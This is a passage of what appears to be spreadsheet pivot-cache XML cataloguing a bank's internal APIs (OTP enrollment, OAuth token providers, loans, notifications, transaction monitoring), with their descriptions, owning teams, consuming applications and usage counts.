    <n v="644396"/>
    <n v="1004509"/>
    <n v="1051208"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-06T17:58:04"/>
    <s v="Tec-Devices"/>
    <n v="100"/>
    <s v="Tec-Device - Authenticate Customer OTP"/>
    <n v="100"/>
    <s v="tec-devices-autenticate-customer-otp"/>
    <s v="Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnologí­a que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID."/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="AutenticarClienteOTP/V2.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="701"/>
    <n v="736"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-06T17:58:04"/>
    <s v="Tec-Devices"/>
    <n v="100"/>
    <s v="Tec-Devices - Enroll Customer OTP"/>
    <n v="100"/>
    <s v="tec-devices-enroll-customer-otp"/>
    <s v="Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnologí­a que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone esta API â€œEnroll Customer OTPâ€?.  La cual permite iniciar el registro de un dispositivo móvil para un cliente especí­fico, enviando un código de activación por el mecanismo definido en DetectID. Este código de activación permitirá vincular el dispositivo móvil. Este código se genera a partir de las configuraciones definidas del canal especificado; sin embargo, una vez que el código de activación es empleado, el dispositivo será registrado en todos los canales, es decir, si un usuario es asociado a otro canal, podrá utilizar su mismo dispositivo sin registrarlo nuevamente. Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese."/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="EnrolarClienteOTP/V2.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="282"/>
    <n v="350"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-02T16:27:39"/>
    <s v="Tec-Edpyme channel"/>
    <n v="100"/>
    <s v="Tec-Edpyme channel - customer information"/>
    <n v="100"/>
    <s v="tec-edpyme-channel-customer-information"/>
    <s v="Esta API permitirá exponer las diferentes consultas que desde el canal Edpyme se requieren para la administración del canal desde el Modulo Administrativo u otros canales o consumidores que requieran hacer uso de estas funcionalidades"/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <s v="Pymes y Empresas"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo Administrativo Canales Digitales_AW1204"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Technical Parameters"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio para la gestión de parámetros técnicos de la plataforma D2B"/>
    <s v="Transf_y_Soporte_Distribución_Digital"/>
    <s v="Distribucion Digital"/>
    <s v="Galatea"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1204001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-17T12:08:19"/>
    <s v="Tec-Investments Channel"/>
    <n v="111"/>
    <s v="Tec-Investments Channel - customer information"/>
    <n v="100"/>
    <s v="tec-investments-channel-customer-information"/>
    <s v="Esta API permitirá exponer las diferentes consultas relacionadas con la información de un cliente del canal de inversiones y de esta manera permitir la administración desde el Módulo Administrativo u otros consumidores."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo Administrativo Canales Digitales_AW1204 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="69"/>
    <n v="95"/>
    <n v="488"/>
    <n v="676"/>
    <n v="1122"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-06-26T11:33:09"/>
    <s v="Tec-Investments Channel"/>
    <n v="111"/>
    <s v="Tec-Investments Channel - Customers Management"/>
    <n v="201"/>
    <s v="tec-investments-channel-customers-management"/>
    <s v="Esta API permite exponer las capacidades para gestionar los clientes en los diferentes canales del banco"/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="Modulo Administrativo Canales Digitales_AW1204 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="1"/>
    <n v="1"/>
    <n v="2"/>
    <n v="2"/>
    <n v="5"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-01-17T12:14:33"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec-Loans  Agreements Enquiry"/>
    <n v="101"/>
    <s v="tec-loans-agreements-enquiry"/>
    <s v="Esta API expone métodos que permiten la consulta datos básicos de convenios empresariales de cartera los cuales pueden ser de libranza, seguros, DAI, ONGs o fundaciones, etc"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="AdministracionConveniosCartera/V1.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <n v="298"/>
    <n v="200"/>
    <n v="1421"/>
    <n v="2520"/>
    <n v="2383"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-24T09:21:51"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec-Loans Customer Information"/>
    <n v="100"/>
    <s v="tec-loans-customer-information"/>
    <s v="El API tiene como objetivo permitir la consulta detallada de un préstamo asociada a un cliente"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaInformacionPrestamos/V1.0"/>
    <s v="STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-09-08T08:40:41"/>
    <s v="Loans Sufi"/>
    <n v="100"/>
    <s v="Tec-Loans Sufi Management"/>
    <n v="100"/>
    <s v="tec-loans-sufi-management"/>
    <s v="API para acceder a las operaciones asociadas a la administración de las obligaciones de un cliente de suf"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-09-08T08:40:41"/>
    <s v="Loans Sufi"/>
    <n v="100"/>
    <s v="Tec-Loans Sufi Retrievet"/>
    <n v="100"/>
    <s v="tec-loans-sufi-retrievet"/>
    <s v="API para la consulta de obligaciones Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-04-21T11:54:58"/>
    <s v="Tec-Mortgage Loans"/>
    <n v="101"/>
    <s v="Tec-Mortgage Loans  Obligations"/>
    <n v="101"/>
    <s v="tec-mortgage-loans-obligations"/>
    <s v="En su versión inicial, esta API expone una capacidad que permite realizar consultas detalladas para obligaciones hipotecarias, a partir del numero de la obligacion."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <s v="Inmobiliario"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <s v="ObligacionesHipotecario/V1.0"/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001"/>
    <n v="11"/>
    <n v="3"/>
    <n v="39"/>
    <n v="641"/>
    <n v="2819"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-07-09T20:26:15"/>
    <s v="Tec-Notifications"/>
    <n v="101"/>
    <s v="Tec-Notifications  Send Alerts And Notifications"/>
    <n v="101"/>
    <s v="tec-notifications-send-alerts-and-notifications"/>
    <s v="La presente API permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así­ el cliente no las haya configurado. Esta API consumirá el servicio EnvioAlertasyNotificaciones, que a su vez invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el Iseries."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="EnvioAlertasYNotificaciones/V1.0"/>
    <s v="PCC - Programas Comunes Canales_Alertas_ISPCC0002"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Tokenizacion_NU0019001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ Tokenizacion_NU0103001"/>
    <n v="8234"/>
    <n v="6256"/>
    <n v="49340"/>
    <n v="73062"/>
    <n v="85331"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-10T22:35:55"/>
    <s v="Tec-Security"/>
    <n v="173"/>
    <s v="Tec-OAuth - Provider from DID"/>
    <n v="130"/>
    <s v="tec-oauth-did"/>
    <s v="Permite realizar la validación de la sesion de un usuario en los canales virtuales y del OTP generado por clave dinamica, y entregar un token de acceso"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <m/>
    <s v="Magda Catalina Trejos"/>
    <m/>
    <m/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ TMP AW0360004_CONSTRUCTOR_SVE _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ PortalLibranzas_AW0360007 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ AppInversiones_AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-11-05T00:47:28"/>
    <s v="Tec-Security"/>
    <n v="206"/>
    <s v="Tec-OAuth - Provider from DID"/>
    <n v="132"/>
    <s v="tec-oauth-did"/>
    <s v="Permite realizar la validación de la sesion de un usuario en los canales virtuales y del OTP generado por clave dinamica, y entregar un token de acceso"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <m/>
    <s v="Magda Catalina Trejos"/>
    <s v="                                              "/>
    <m/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ SUID_AW1310 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ NEQUIMAPAS_AW1011 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="23103"/>
    <n v="12603"/>
    <n v="80018"/>
    <n v="151727"/>
    <n v="174106"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-10T22:35:55"/>
    <s v="Tec-Security"/>
    <n v="173"/>
    <s v="Tec-OAuth - Provider from OTP"/>
    <n v="120"/>
    <s v="tec-oauth-otp"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <m/>
    <s v="Magda Catalina Trejos"/>
    <m/>
    <m/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ TMP AW0360004_CONSTRUCTOR_SVE _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ PortalLibranzas_AW0360007 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ AppInversiones_AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-10T22:35:55"/>
    <s v="Tec-Security"/>
    <n v="206"/>
    <s v="Tec-OAuth - Provider from OTP"/>
    <n v="120"/>
    <s v="tec-oauth-otp"/>
    <s v="Esta API de OAuth permite generar un token de autorización en APIC a partir del Id de sesión generados en los canales con los servicios de WAS cambiar código por token"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <m/>
    <s v="Magda Catalina Trejos"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <m/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ SUID_AW1310 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ NEQUIMAPAS_AW1011 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-02-11T14:18:09"/>
    <s v="Tec-Security"/>
    <n v="173"/>
    <s v="Tec-OAuth - Provider from WAS SessionId"/>
    <n v="143"/>
    <s v="tec-oauth-sessionid"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ TMP AW0360004_CONSTRUCTOR_SVE _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ PortalLibranzas_AW0360007 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ AppInversiones_AW1185001"/>
    <n v="6"/>
    <n v="9"/>
    <n v="64"/>
    <n v="710"/>
    <n v="383"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-05T13:37:37"/>
    <s v="Tec-Security"/>
    <n v="206"/>
    <s v="Tec-OAuth - Provider from WAS SessionId"/>
    <n v="204"/>
    <s v="tec-oauth-sessionid"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ SUID_AW1310 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ NEQUIMAPAS_AW1011 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="1075"/>
    <n v="668"/>
    <n v="8073"/>
    <n v="563366"/>
    <n v="320165"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-01-08T21:55:26"/>
    <s v="Tec-Security"/>
    <n v="173"/>
    <s v="Tec-OAuth-Provider From Simple Customer Authentication"/>
    <n v="101"/>
    <s v="tec-oauth-provider-from-simple-customer-authentication"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <m/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ TMP AW0360004_CONSTRUCTOR_SVE _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ PortalLibranzas_AW0360007 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ AppInversiones_AW1185001"/>
    <n v="9327"/>
    <n v="1034"/>
    <n v="677"/>
    <n v="1463"/>
    <n v="3350"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-05T13:37:37"/>
    <s v="Tec-Security"/>
    <n v="206"/>
    <s v="Tec-OAuth-Provider From Simple Customer Authentication"/>
    <n v="104"/>
    <s v="tec-oauth-provider-from-simple-customer-authentication"/>
    <s v="Esta API de OAuth permite generar un token de autorización en APIConnect a partir del id de sesión generado en el WAS, Token generado por AutenticacionCliente en Datapower."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ SUID_AW1310 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ NEQUIMAPAS_AW1011 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="12"/>
    <n v="18"/>
    <n v="38"/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-18T20:19:30"/>
    <s v="Tec-Reference Data Management"/>
    <n v="120"/>
    <s v="Tec-Reference Data Management - Util Reference Information"/>
    <n v="101"/>
    <s v="tec-reference-data-management-util-reference-information"/>
    <s v="Consulta de información de referencia necesaria para la gestión de las entidades del producto de gestión de nómina, inicialmente se plantean consulta de: Departamentos, ciudades, bancos, cajas de compensación, EPS, fondos de pensiones, ARLs, fondos de cesantí­as, operadores de seguridad social y software contables."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="73"/>
    <n v="50"/>
    <n v="1231"/>
    <n v="2055"/>
    <n v="2867"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-07-07T03:41:36"/>
    <s v="Tec-Security WAS"/>
    <n v="202"/>
    <s v="Tec-Security - Code Validation"/>
    <n v="202"/>
    <s v="tec-security-code-validation"/>
    <s v="Esta API permite realizar el proceso de autenticación OAuth 2.0 expuesto en WAS, por medio de la verificación de un código de autorización que es previamente generado y posteriormente enviado por el cliente, si el proceso es exitoso genera un access_token con este sistema de autenticación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionAutenticacionOAuth2/V1.0"/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ FUA_AW1291001"/>
    <n v="211143"/>
    <n v="146619"/>
    <n v="959799"/>
    <n v="1784964"/>
    <n v="1886227"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-12-12T21:36:33"/>
    <s v="Tec-Token"/>
    <n v="100"/>
    <s v="Tec-Token - Management"/>
    <n v="100"/>
    <s v="tec-token-management"/>
    <s v="API que permite la gestión del token para clientes y no clientes, utilizado por cualquier aplicación que requiere hacer uso de una autenticación OTP mediante la generación de un token. Esta generación de un token puede ser enviado ví­a celular como un mensaje de texto o al correo electrónico permitiéndole el uso de una plantilla para el mensaje; para así­ autenticar el cliente."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ plink_AW1206001"/>
    <n v="26"/>
    <n v="21"/>
    <n v="137"/>
    <n v="209"/>
    <n v="201"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-04T12:12:22"/>
    <s v="Tec-Token"/>
    <n v="210"/>
    <s v="Tec-Token - Management"/>
    <n v="210"/>
    <s v="tec-token-management"/>
    <s v="API que permite la gestión del token para clientes y no clientes, utilizado por cualquier aplicación que requiere hacer uso de una autenticación OTP mediante la generación de un token. Esta generación de un token puede ser enviado ví­a celular como un mensaje de texto o al correo electrónico permitiéndole el uso de una plantilla para el mensaje; para así­ autenticar el cliente."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <s v="_x000a_PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="CapaGestionCanal_NU0014001"/>
    <n v="22100"/>
    <n v="16165"/>
    <n v="103856"/>
    <n v="156387"/>
    <n v="181976"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-09-24T22:27:50"/>
    <s v="Tec-Transaction"/>
    <n v="102"/>
    <s v="Tec-Transaction-Transactional Monitoring"/>
    <n v="102"/>
    <s v="tec-transaction-transactional-monitoring"/>
    <s v="La API â€œMonitoreo Transaccionalâ€? ofrece la capacidad de evaluar las transacciones permitiendo calificar  el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="App inversionesGB_AW1185001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-09-24T22:27:50"/>
    <s v="Tec-Transaction"/>
    <n v="200"/>
    <s v="Tec-Transaction-Transactional Monitoring"/>
    <n v="200"/>
    <s v="tec-transaction-transactional-monitoring"/>
    <s v="La API â€œMonitoreo Transaccionalâ€? ofrece la capacidad de evaluar las transacciones permitiendo calificar  el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="App inversionesGB_AW1185001"/>
    <n v="11043"/>
    <n v="10795"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-18T17:55:43"/>
    <s v="Third Party Authentication"/>
    <n v="112"/>
    <s v="Third Party Authentication - Management"/>
    <n v="112"/>
    <s v="third-party-authentication-management"/>
    <s v="Entregara al tercero la URL delformulario de autenticacion"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
